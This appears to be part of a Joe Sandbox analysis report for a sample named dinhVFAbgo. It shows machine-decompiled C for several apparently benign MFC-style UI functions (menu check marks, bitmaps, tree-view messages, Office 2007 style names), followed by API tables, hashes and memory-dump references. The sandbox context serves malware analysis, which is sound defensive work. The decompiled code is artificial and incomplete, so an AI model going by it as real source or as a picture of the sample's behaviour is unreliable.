							_t76 = SendMessageA( *( *((intOrPtr*)(_t160 + 0x14)) + 0x20), 0xf1, _a4, 0);
						}
						goto L7;
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
						L7:
						return _t76;
					} else {
						_t132 =  *(__ecx + 8);
						if(_t132 >=  *((intOrPtr*)(__ecx + 0x20))) {
							L8:
							E00CAA4E7(_t124, _t132, _t150, _t160, __eflags);
							asm("int3");
							_t174 = _t178;
							_t151 = _t132;
							__eflags = _v4;
							_t147 = _t151->i;
							 *0xe17a64(0 | _v4 != 0x00000000, _t150, _t160, _t173);
							_t134 = _t151;
							_t82 =  *( *(_t147 + 4))();
							_t162 = 0;
							__eflags =  *(_t151 + 0xc);
							if( *(_t151 + 0xc) == 0) {
								L14:
								return _t82;
							} else {
								__eflags =  *(_t151 + 0x10);
								if( *(_t151 + 0x10) != 0) {
									goto L14;
								} else {
									__eflags =  *(_t151 + 8) -  *((intOrPtr*)(_t151 + 0x20));
									if(__eflags >= 0) {
										E00CAA4E7(_t124, _t134, _t151, 0, __eflags);
										asm("int3");
										_push(_t174);
										_t175 = _t178;
										_t85 = _v60.cch;
										_t179 = _t178 - 0x30;
										__eflags = _t85;
										if(__eflags == 0) {
											L23:
											E00CAA4E7(_t124, _t134, _t151, _t162, __eflags);
											asm("int3");
											_push(_t175);
											_t176 = _t179;
											_t180 = _t179 - 0x90;
											_t87 =  *0xe68dd4; // 0x8d2643c2
											_v84 = _t87 ^ _t176;
											_push(_t124);
											_push(_t162);
											_push(_t151);
											_t89 = GetMenuCheckMarkDimensions();
											_t164 = _t89;
											_t153 = _t89 >> 0x10;
											_v224 = _t164;
											_v220 = _t153;
											__eflags = _t164 - 4;
											if(__eflags <= 0) {
												L37:
												E00CAA4E7(_t124, _t134, _t153, _t164, __eflags);
												asm("int3");
												_push(_t176);
												_push(0xffffffff);
												_push(0xe086f7);
												_push( *[fs:0x0]);
												_push(_t124);
												_push(_t164);
												_push(_t153);
												_t93 =  *0xe68dd4; // 0x8d2643c2
												_push(_t93 ^ _t180);
												 *[fs:0x0] =  &_v252;
												_v256 = _t180 - 0x10;
												_t165 = _v232;
												__eflags = _t165;
												if(__eflags != 0) {
													_t154 = 0x8007000e;
													_t165->i = 0;
													_v60.hSubMenu = 0x8007000e;
													_v60.wID = 0;
													_v60.dwTypeData = 0;
													_t96 = E00CA9583(__eflags, 0x18);
													__eflags = _t96;
													if(_t96 == 0) {
														_t96 = 0;
													} else {
														 *((intOrPtr*)(_t96 + 0x14)) = 0;
														 *((intOrPtr*)(_t96 + 8)) = 0;
														 *((intOrPtr*)(_t96 + 0xc)) = 0;
														_t96->i = 0xe19068;
														 *((intOrPtr*)(_t96 + 4)) = 0xe190e0;
														 *((intOrPtr*)(_t96 + 0x10)) = 0xe190f4;
													}
													__eflags = _t96;
													if(_t96 != 0) {
														_t154 = 0;
													}
													_t165->i = _t96;
													_t97 = _t154;
												} else {
													_t97 = 0x80004003;
												}
												 *[fs:0x0] = _v60.hbmpUnchecked;
												return _t97;
											} else {
												__eflags = _t153 - 5;
												if(__eflags <= 0) {
													goto L37;
												} else {
													__eflags = _t164 - 0x20;
													if(_t164 <= 0x20) {
														_t46 = _t164 - 4; // -4
														asm("cdq");
														_t47 = _t164 + 0xf; // 0xf
														_t139 = _t47 >> 4;
														_v152 = _t139;
														_t130 = (_t46 - _t147 >> 1) + (_t139 << 4) - _t164;
														__eflags = _t130 - 0xc;
														if(_t130 > 0xc) {
															goto L29;
														}
													} else {
														_t170 = 0x20;
														_v160 = _t170;
														_v152 = 2;
														L29:
														_t130 = 0xc;
													}
													__eflags = _t153 - 0x20;
													if(_t153 > 0x20) {
														_t153 = 0x20;
														_v156 = _t153;
													}
													E00DDFBE0(_t153,  &_v148, 0xff, 0x80);
													_t141 = _v152;
													_t104 = (_t153 - 6 >> 1) * _t141;
													__eflags = _t104;
													_t156 = 0xe18504;
													_t167 = 5;
													_t149 =  &_v148 + _t104 * 2;
													_v152 = _t141 + _t141;
													do {
														_t107 =  *_t156 & 0x000000ff;
														_t156 =  &(_t156[0]);
														_t143 =  !(_t107 << _t130) & 0x0000ffff;
														 *(_t149 + 1) = _t143;
														 *_t149 = _t143 >> 8;
														_t149 = _t149 + _v152;
														_t167 = _t167 - 1;
														__eflags = _t167;
													} while (_t167 != 0);
													_t113 = CreateBitmap(_v160, _v156, 1, 1,  &_v148);
													 *0xe85260 = _t113;
													_pop(_t158);
													_pop(_t169);
													_pop(_t131);
													__eflags = _t113;
													if(_t113 == 0) {
														 *0xe85260 = _t113;
													}
													__eflags = _v60.cch ^ _t176;
													return E00DDCBCE(_t113, _t131, _v60.cch ^ _t176, _t149, _t158, _t169);
												}
											}
										} else {
											_t147 =  *(_t134 + 0xc);
											__eflags = _t147;
											if(_t147 == 0) {
												__eflags = _t134;
												if(__eflags != 0) {
													_push(_t85);
													return E00CB8416(_t147,  *((intOrPtr*)(_t134 + 0x20)));
												}
												goto L23;
											} else {
												__eflags =  *(_t134 + 0x10);
												if( *(_t134 + 0x10) != 0) {
													return _t85;
												} else {
													_push(0);
													_t162 =  *(_t134 + 8);
													__eflags = _t162 -  *((intOrPtr*)(_t134 + 0x20));
													if(__eflags < 0) {
														_v60.dwTypeData = _t85;
														_v60.cbSize = 0x30;
														_v60.fMask = 0x40;
														return SetMenuItemInfoA( *(_t147 + 4), _t162, 1,  &_v60);
													}
													goto L23;
												}
											}
										}
									} else {
										_t118 =  *0xe85260; // 0x0
										__eflags = _t118;
										if(_t118 != 0) {
											L13:
											_t82 = SetMenuItemBitmaps( *( *(_t151 + 0xc) + 4),  *(_t151 + 8), 0x400, _t162, _t118);
										} else {
											L24();
											_t82 =  *0xe85260; // 0x0
											__eflags = _t82;
											if(_t82 != 0) {
												goto L13;
											}
										}
										goto L14;
									}
								}
							}
						} else {
							_t76 = CheckMenuItem( *(_t146 + 4), _t132, 0x400 + (0 | _a4 != 0x00000000) * 8);
							goto L7;
						}
					}
				}
			}

0x00cb03ce
0x00cb03ce
0x00cb03ce
0x00cb03d2
0x00cb03d4
0x00cb03d9
0x00cb0405
0x00cb0408
0x00cb040a
0x00000000
0x00cb040c
0x00cb0418
0x00cb041e
0x00cb0423
0x00cb0435
0x00cb0435
0x00000000
0x00cb0423
0x00cb03db
0x00cb03df
0x00cb043b
0x00cb043d
0x00cb03e1
0x00cb03e1
0x00cb03e7
0x00cb0440
0x00cb0440
0x00cb0445
0x00cb0447
0x00cb044b
0x00cb044f
0x00cb0455
0x00cb045d
0x00cb0463
0x00cb0465
0x00cb0467
0x00cb0469
0x00cb046c
0x00cb04a8
0x00cb04ab
0x00cb046e
0x00cb046e
0x00cb0471
0x00000000
0x00cb0473
0x00cb0476
0x00cb0479
0x00cb04ae
0x00cb04b3
0x00cb04b4
0x00cb04b5
0x00cb04b7
0x00cb04ba
0x00cb04bd
0x00cb04bf
0x00cb050f
0x00cb050f
0x00cb0514
0x00cb0515
0x00cb0516
0x00cb0518
0x00cb051e
0x00cb0525
0x00cb0528
0x00cb0529
0x00cb052a
0x00cb052b
0x00cb0531
0x00cb0537
0x00cb053a
0x00cb0540
0x00cb0546
0x00cb0549
0x00cb0654
0x00cb0654
0x00cb0659
0x00cb065a
0x00cb065d
0x00cb065f
0x00cb066a
0x00cb066e
0x00cb066f
0x00cb0670
0x00cb0671
0x00cb0678
0x00cb067c
0x00cb0682
0x00cb0685
0x00cb0688
0x00cb068a
0x00cb0695
0x00cb069c
0x00cb069e
0x00cb06a1
0x00cb06a4
0x00cb06a7
0x00cb06ad
0x00cb06af
0x00cb06d0
0x00cb06b1
0x00cb06b1
0x00cb06b4
0x00cb06b7
0x00cb06ba
0x00cb06c0
0x00cb06c7
0x00cb06c7
0x00cb06d2
0x00cb06d4
0x00cb06d6
0x00cb06d6
0x00cb06f1
0x00cb06f3
0x00cb068c
0x00cb068c
0x00cb068c
0x00cb06f8
0x00cb0704
0x00cb054f
0x00cb054f
0x00cb0552
0x00000000
0x00cb0558
0x00cb0558
0x00cb055b
0x00cb0572
0x00cb0575
0x00cb0576
0x00cb0579
0x00cb0580
0x00cb058d
0x00cb058f
0x00cb0592
0x00000000
0x00000000
0x00cb055d
0x00cb055f
0x00cb0560
0x00cb0566
0x00cb0594
0x00cb0596
0x00cb0596
0x00cb0597
0x00cb059a
0x00cb059e
0x00cb059f
0x00cb059f
0x00cb05b6
0x00cb05bb
0x00cb05c9
0x00cb05c9
0x00cb05d2
0x00cb05d9
0x00cb05da
0x00cb05e0
0x00cb05e6
0x00cb05ea
0x00cb05ed
0x00cb05f4
0x00cb05f9
0x00cb05ff
0x00cb0601
0x00cb0607
0x00cb0607
0x00cb0607
0x00cb0625
0x00cb062b
0x00cb0630
0x00cb0631
0x00cb0632
0x00cb0633
0x00cb0635
0x00cb0643
0x00cb0643
0x00cb064b
0x00cb0653
0x00cb0653
0x00cb0552
0x00cb04c1
0x00cb04c1
0x00cb04c4
0x00cb04c6
0x00cb04fe
0x00cb0500
0x00cb0502
0x00000000
0x00cb0506
0x00000000
0x00cb04c8
0x00cb04c8
0x00cb04cc
0x00cb050c
0x00cb04ce
0x00cb04ce
0x00cb04cf
0x00cb04d2
0x00cb04d5
0x00cb04d7
0x00cb04e1
0x00cb04e8
0x00000000
0x00cb04f8
0x00000000
0x00cb04d5
0x00cb04cc
0x00cb04c6
0x00cb047b
0x00cb047b
0x00cb0480
0x00cb0482
0x00cb0492
0x00cb04a2
0x00cb0484
0x00cb0484
0x00cb0489
0x00cb048e
0x00cb0490
0x00000000
0x00000000
0x00cb0490
0x00000000
0x00cb0482
0x00cb0479
0x00cb0471
0x00cb03e9
0x00cb03fd
0x00000000
0x00cb03fd
0x00cb03e7
0x00cb03df

APIs

CheckMenuItem.USER32(?,?,00000000), ref: 00CB03FD

Part of subcall function 00CB8416: _strlen.LIBCMT ref: 00CB843B
Part of subcall function 00CB8416: GetWindowTextA.USER32 ref: 00CB846C
Part of subcall function 00CB8416: lstrcmpA.KERNEL32(?,00CB050B,?,00000000), ref: 00CB847E
Part of subcall function 00CB8416: SetWindowTextA.USER32(?,00CB050B), ref: 00CB848A

SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00CB0418
SendMessageA.USER32(?,000000F1,?,00000000), ref: 00CB0435
SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00000000), ref: 00CB04A2
SetMenuItemInfoA.USER32(?,?,00000001,?), ref: 00CB04F2

Strings

0, xrefs: 00CB04E1
@, xrefs: 00CB04E8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfo_strlenlstrcmp
String ID: 0$@
API String ID: 1592389682-1545510068
Opcode ID: cf9d60fcd91eacf743107ddf613c15ca2fcb1941d8c80f647410640c2fd3e4b8
Instruction ID: e355c715f54de76276e672f3bbaf2b93fe4d0c50f9a8fb48ecb2ad04592c7387
Opcode Fuzzy Hash: cf9d60fcd91eacf743107ddf613c15ca2fcb1941d8c80f647410640c2fd3e4b8
Instruction Fuzzy Hash: 8241DB31200205AFDB249F26C844BEBB7B9FF04710F20C629F65AA7960DBB0E951CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00CD4318 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00CD4318(void* __ebx, intOrPtr* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				void* _t39;
				void* _t41;
				intOrPtr _t55;
				intOrPtr* _t60;
				intOrPtr* _t66;
				intOrPtr _t69;
				signed int _t77;
				void* _t93;

				_t87 = __esi;
				_t83 = __edi;
				_t67 = __ecx;
				_push(0x78);
				E00DDD52C(0xe0a028, __ebx, __edi, __esi);
				_t66 = __ecx;
				if( *0xe885c8 == 0) {
					L7:
					E00CAA4E7(_t66, _t67, _t83, _t87, __eflags);
					asm("int3");
					return 0xe1db88;
				} else {
					_t87 = 0;
					if(SHGetSpecialFolderLocation(0, 0, _t93 - 0x14) < 0) {
						L6:
						_t39 = 0;
						goto L5;
					} else {
						_t41 = _t93 - 0x18;
						__imp__SHGetDesktopFolder(_t41);
						if(_t41 < 0) {
							goto L6;
						} else {
							 *(_t93 - 0x40) = 0x67;
							_t83 = GlobalAlloc(0x40, 0xc);
							if(_t83 == 0) {
								goto L7;
							} else {
								 *(_t83 + 8) =  *(_t93 - 0x14);
								_t69 =  *0xe885c8; // 0x0
								 *((intOrPtr*)(_t83 + 4)) = E00D1E0B1(_t66, _t69, _t83, 0,  *(_t93 - 0x14));
								 *_t83 = 0;
								 *((intOrPtr*)(_t93 - 0x1c)) = _t83;
								 *0xe17a64(_t93 - 0x10, _t83);
								 *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x164))))();
								 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
								 *((intOrPtr*)(_t93 - 0x30)) = E00CA2BCE(_t66, _t93 - 0x10,  *((intOrPtr*)( *_t66 + 0x164)),  *((intOrPtr*)( *((intOrPtr*)(_t93 - 0x10)) - 0xc)));
								 *0xe17a64(_t83, 0);
								 *((intOrPtr*)(_t93 - 0x28)) =  *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x168))))();
								 *0xe17a64(_t83, 1);
								_t55 =  *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x168))))();
								_t77 = 0xa;
								 *((intOrPtr*)(_t93 - 0x24)) = _t55;
								 *((intOrPtr*)(_t93 - 0x20)) = 1;
								memcpy(_t93 - 0x7c, _t93 - 0x40, _t77 << 2);
								 *((intOrPtr*)(_t93 - 0x80)) = 0xffff0002;
								 *(_t93 - 0x84) = 0xffff0000;
								SendMessageA( *(_t66 + 0x20), 0x1102, 2, SendMessageA( *(_t66 + 0x20), 0x1100, 0, _t93 - 0x84));
								_t60 =  *((intOrPtr*)(_t93 - 0x18));
								 *0xe17a64(_t60);
								E00CA2975( *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8))))(),  *((intOrPtr*)(_t93 - 0x10)) + 0xfffffff0);
								_t39 = 1;
								L5:
								return E00DDD4FA(_t39);
							}
						}
					}
				}
			}

0x00cd4318
0x00cd4318
0x00cd4318
0x00cd4318
0x00cd431f
0x00cd4324
0x00cd432d
0x00cd4469
0x00cd4469
0x00cd446e
0x00cd4474
0x00cd4333
0x00cd4336
0x00cd4342
0x00cd4465
0x00cd4465
0x00000000
0x00cd4348
0x00cd4348
0x00cd434c
0x00cd4354
0x00000000
0x00cd435a
0x00cd435e
0x00cd436b
0x00cd436f
0x00000000
0x00cd4375
0x00cd4378
0x00cd437e
0x00cd4389
0x00cd438c
0x00cd4391
0x00cd43a0
0x00cd43a8
0x00cd43b0
0x00cd43bc
0x00cd43cc
0x00cd43d6
0x00cd43e6
0x00cd43ee
0x00cd43f2
0x00cd43f3
0x00cd43ff
0x00cd4414
0x00cd4416
0x00cd441d
0x00cd4438
0x00cd443e
0x00cd4449
0x00cd4457
0x00cd445e
0x00cd445f
0x00cd4464
0x00cd4464
0x00cd436f
0x00cd4354
0x00cd4342

APIs

__EH_prolog3.LIBCMT ref: 00CD431F
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,00000078), ref: 00CD433B
SHGetDesktopFolder.SHELL32(?,00000000,00000000,?,00000078), ref: 00CD434C
GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00CD4365
SendMessageA.USER32 ref: 00CD4427
SendMessageA.USER32(00000001,00001102,00000002,00000000), ref: 00CD4438

Strings

g, xrefs: 00CD435E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: FolderMessageSend$AllocDesktopGlobalH_prolog3LocationSpecial
String ID: g
API String ID: 4238072464-30677878
Opcode ID: 023914376baa2e04237d124108e68c691748aa042de0e0a47790773a3e2a7257
Instruction ID: 7fa56ad1ea6135678fa2ef894105c8df5548ef57df6666aaa16de5d9d6be1880
Opcode Fuzzy Hash: 023914376baa2e04237d124108e68c691748aa042de0e0a47790773a3e2a7257
Instruction Fuzzy Hash: 97414870A0021A9FCB149FA5CC49BEEBBB5FF48700F10416AF615AB391CB749944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CD47E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CD47E4(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, long* _a8) {
				long _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v64;
				void* __esi;
				void* __ebp;
				intOrPtr _t20;
				void* _t27;
				long _t28;
				long* _t31;
				long _t39;
				void* _t45;
				long _t47;
				void* _t48;

				_t43 = __edx;
				_t41 = __ecx;
				_t38 = __ebx;
				_t20 = _a4;
				_push(__ebx);
				_push(_t47);
				_t45 = __ecx;
				if(_t20 == 0) {
					L14:
					E00CAA4E7(_t38, _t41, _t45, _t47, __eflags);
					asm("int3");
					_push(_t41);
					_push(_t47);
					_t48 = _t41;
					E00CB7A0A(_t38, _t41, _t43);
					_t14 =  &_v64;
					 *_t14 = _v64 & 0x00000000;
					__eflags =  *_t14;
					return SendMessageA( *(_t48 + 0x20), 0x110b, 9, E00CD776B(_t48, _v48, _v44,  &_v64));
				} else {
					_t47 =  *(_t20 + 0x3c);
					if(_t47 == 0) {
						goto L14;
					} else {
						_t39 = 0;
						_t27 =  *((intOrPtr*)(_t20 + 0xc)) - 1;
						if(_t27 == 0) {
							_t28 = SendMessageA( *(__ecx + 0x20), 0x110a, 9, _t39);
							while(1) {
								__eflags = _t28;
								if(_t28 == 0) {
									break;
								}
								_t28 = SendMessageA( *(_t45 + 0x20), 0x110a, 3, _t28);
								__eflags = _t28 - _t47;
								if(_t28 == _t47) {
									SendMessageA( *(_t45 + 0x20), 0x110b, 9, _t47);
								} else {
									continue;
								}
								L11:
								_push(_t47);
								_push(0x8001);
								_push(0x1102);
								goto L12;
							}
							goto L11;
						} else {
							_t59 = _t27 == 1;
							if(_t27 == 1) {
								_push(_t47);
								E00CD418F(_t39, __ecx, __edx, __ecx, _t47, _t59);
								if(SendMessageA( *(_t45 + 0x20), 0x110a, 4, _t47) == 0) {
									E00DDFBE0(_t45,  &_v44, _t39, 0x28);
									_v40 = _t47;
									_v44 = 0x40;
									_push( &_v44);
									_push(_t39);
									_push(0x110d);
									L12:
									SendMessageA( *(_t45 + 0x20), ??, ??, ??);
								}
							}
						}
						_t31 = _a8;
						 *_t31 = _t39;
						return _t31;
					}
				}
			}

0x00cd47e4
0x00cd47e4
0x00cd47e4
0x00cd47e7
0x00cd47ed
0x00cd47ee
0x00cd47f0
0x00cd47f4
0x00cd48b8
0x00cd48b8
0x00cd48bd
0x00cd48c1
0x00cd48c2
0x00cd48c3
0x00cd48c5
0x00cd48ca
0x00cd48ca
0x00cd48ca
0x00cd48f2
0x00cd47fa
0x00cd47fa
0x00cd47ff
0x00000000
0x00cd4805
0x00cd480a
0x00cd480b
0x00cd480e
0x00cd4864
0x00cd4881
0x00cd4881
0x00cd4883
0x00000000
0x00000000
0x00cd4877
0x00cd487d
0x00cd487f
0x00cd4892
0x00000000
0x00000000
0x00000000
0x00cd4898
0x00cd4898
0x00cd4899
0x00cd489e
0x00000000
0x00cd489e
0x00000000
0x00cd4810
0x00cd4810
0x00cd4813
0x00cd4819
0x00cd481a
0x00cd4832
0x00cd483b
0x00cd4843
0x00cd4849
0x00cd4850
0x00cd4851
0x00cd4852
0x00cd48a3
0x00cd48a6
0x00cd48a6
0x00cd4832
0x00cd4813
0x00cd48ac
0x00cd48b1
0x00cd48b5
0x00cd48b5
0x00cd47ff

APIs

SendMessageA.USER32(?,0000110A,00000004,?), ref: 00CD482A
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00CD4864
SendMessageA.USER32(?,00001102,00008001,?), ref: 00CD48A6

Part of subcall function 00CD418F: __EH_prolog3.LIBCMT ref: 00CD4196
Part of subcall function 00CD418F: SendMessageA.USER32(?,0000110C,00000000,?), ref: 00CD41D8

SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 00CD48EA

Strings

@, xrefs: 00CD4849

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$H_prolog3
String ID: @
API String ID: 1885053084-2766056989
Opcode ID: 4670fad1cec7b9de448969e89ee7a19ead299c8445df6918dfb5f47bf809f750
Instruction ID: 70086bc527f87c5be4c3d0ac60a6ed8495b66fcc5ee239322a7c2636da343c63
Opcode Fuzzy Hash: 4670fad1cec7b9de448969e89ee7a19ead299c8445df6918dfb5f47bf809f750
Instruction Fuzzy Hash: 09318471A40204BFEB195F55DC4AEDA7BBCFB08BA2F005112F745F66E0D7B09D409AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD7B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CCD7B8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t26;
				int _t27;
				void* _t31;
				int _t32;
				void* _t47;
				void* _t51;
				void* _t52;

				_t47 = __edx;
				_push(0x94);
				E00DDD55F(0xe09b9e, __ebx, __edi, __esi);
				_t51 = __ecx;
				E00CB079B(_t52 - 0xa0);
				 *((intOrPtr*)(_t52 - 0xa0)) = 0xe1be88;
				 *((intOrPtr*)(_t52 - 0x18)) = 0x64;
				 *((intOrPtr*)(_t52 - 0x14)) = 0x14;
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *((intOrPtr*)(_t52 - 0x20)) = 0;
				 *((intOrPtr*)(_t52 - 0x1c)) = 0;
				E00CD7F59(_t52 - 0xa0, 0x40000000, _t52 - 0x20, __ecx, 0xffffffff);
				_t26 = E00CCDE3C(_t51);
				if(_t26 != 0) {
					_t27 =  *(_t26 + 4);
				} else {
					_t27 = 0;
				}
				SendMessageA( *(_t52 - 0x80), 0x30, _t27, 1);
				 *(_t51 + 0x344) = SendMessageA( *(_t52 - 0x80), 0xd4, 0, 0) & 0x0000ffff;
				_t31 = _t51 + 0x320;
				if(_t31 != 0) {
					_t32 =  *(_t31 + 4);
				} else {
					_t32 = 0;
				}
				SendMessageA( *(_t52 - 0x80), 0x30, _t32, 1);
				 *(_t51 + 0x348) = SendMessageA( *(_t52 - 0x80), 0xd4, 0, 0) & 0x0000ffff;
				E00CB23A9(0xd4, _t52 - 0xa0, _t47);
				E00CD7DC2(0xd4, _t52 - 0xa0, _t47);
				return E00DDD50E(0xd4, 0, _t51);
			}

0x00ccd7b8
0x00ccd7b8
0x00ccd7c2
0x00ccd7c7
0x00ccd7cf
0x00ccd7d4
0x00ccd7e4
0x00ccd7ed
0x00ccd800
0x00ccd803
0x00ccd806
0x00ccd809
0x00ccd810
0x00ccd817
0x00ccd81d
0x00ccd819
0x00ccd819
0x00ccd819
0x00ccd828
0x00ccd842
0x00ccd848
0x00ccd850
0x00ccd856
0x00ccd852
0x00ccd852
0x00ccd852
0x00ccd861
0x00ccd87c
0x00ccd882
0x00ccd88d
0x00ccd897

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCD7C2

Part of subcall function 00CCDE3C: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00CCDE45

SendMessageA.USER32(?,00000030,?,00000001), ref: 00CCD828
SendMessageA.USER32(?,000000D4,00000000,00000000), ref: 00CCD839
SendMessageA.USER32(?,00000030,?,00000001), ref: 00CCD861
SendMessageA.USER32(?,000000D4,00000000,00000000), ref: 00CCD86D
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00CCD88D

Strings

d, xrefs: 00CCD7E4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$ContextExternal$BaseBase::~Concurrency::details::H_prolog3_
String ID: d
API String ID: 1047725533-2564639436
Opcode ID: 37c06f3a1fbf0ff1c7cbdaf78a49f8d7bb89ac248e1b6a3cc64d973ef980dc02
Instruction ID: 26e9c3b9b9e4f2844910cd1364e2ce02791df923d82fe1905a292394e120fb55
Opcode Fuzzy Hash: 37c06f3a1fbf0ff1c7cbdaf78a49f8d7bb89ac248e1b6a3cc64d973ef980dc02
Instruction Fuzzy Hash: B2218C70A00218AFDB21AFA5CC45FEEBBB9FF51744F00006AF556B62A1DB709A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D28163 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00D28163(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t24;
				void* _t29;
				void* _t35;
				void* _t36;
				char* _t50;
				void* _t52;
				void* _t55;

				_t55 = __eflags;
				_t51 = __esi;
				_t38 = __ebx;
				_push(0xc);
				E00DDD52C(0xe0de3f, __ebx, __edi, __esi);
				 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
				 *(_t52 - 0x14) =  *(_t52 - 0x14) & 0x00000000;
				_push("IDX_OFFICE2007_STYLE");
				E00CA2ABC(__ebx,  *((intOrPtr*)(_t52 + 8)), __edi, __esi, _t55);
				_t50 = 1;
				 *(_t52 - 0x14) = 1;
				E00CA67E1(_t52 - 0x10);
				 *(_t52 - 4) = 1;
				_t24 =  *((intOrPtr*)(_t52 + 0xc));
				if(_t24 == 0) {
					_t50 = "BLUE_";
					goto L8;
				} else {
					_t35 = _t24 - 1;
					if(_t35 == 0) {
						_t50 = "BLACK_";
						goto L8;
					} else {
						_t36 = _t35 - 1;
						if(_t36 == 0) {
							_t50 = "AQUA_";
							goto L8;
						} else {
							_t59 = _t36 == 1;
							if(_t36 == 1) {
								_t50 = "SILVER_";
								L8:
								_push(E00DEC1A0(_t50));
								E00CA2CD7(_t38, _t52 - 0x10, _t50, _t51, _t50);
							}
						}
					}
				}
				_push( *((intOrPtr*)(_t52 + 8)));
				_push(_t52 - 0x10);
				_push(_t52 - 0x18);
				_t29 = E00CC2389(_t38, _t50, _t51, _t59);
				 *(_t52 - 4) = 2;
				E00CA2975(E00CA2975(E00CA68A8( *((intOrPtr*)(_t52 + 8)), _t29),  *((intOrPtr*)(_t52 - 0x18)) + 0xfffffff0),  *((intOrPtr*)(_t52 - 0x10)) + 0xfffffff0);
				return E00DDD4FA( *((intOrPtr*)(_t52 + 8)));
			}

0x00d28163
0x00d28163
0x00d28163
0x00d28163
0x00d2816a
0x00d2816f
0x00d28173
0x00d2817a
0x00d2817f
0x00d28189
0x00d2818a
0x00d2818d
0x00d28195
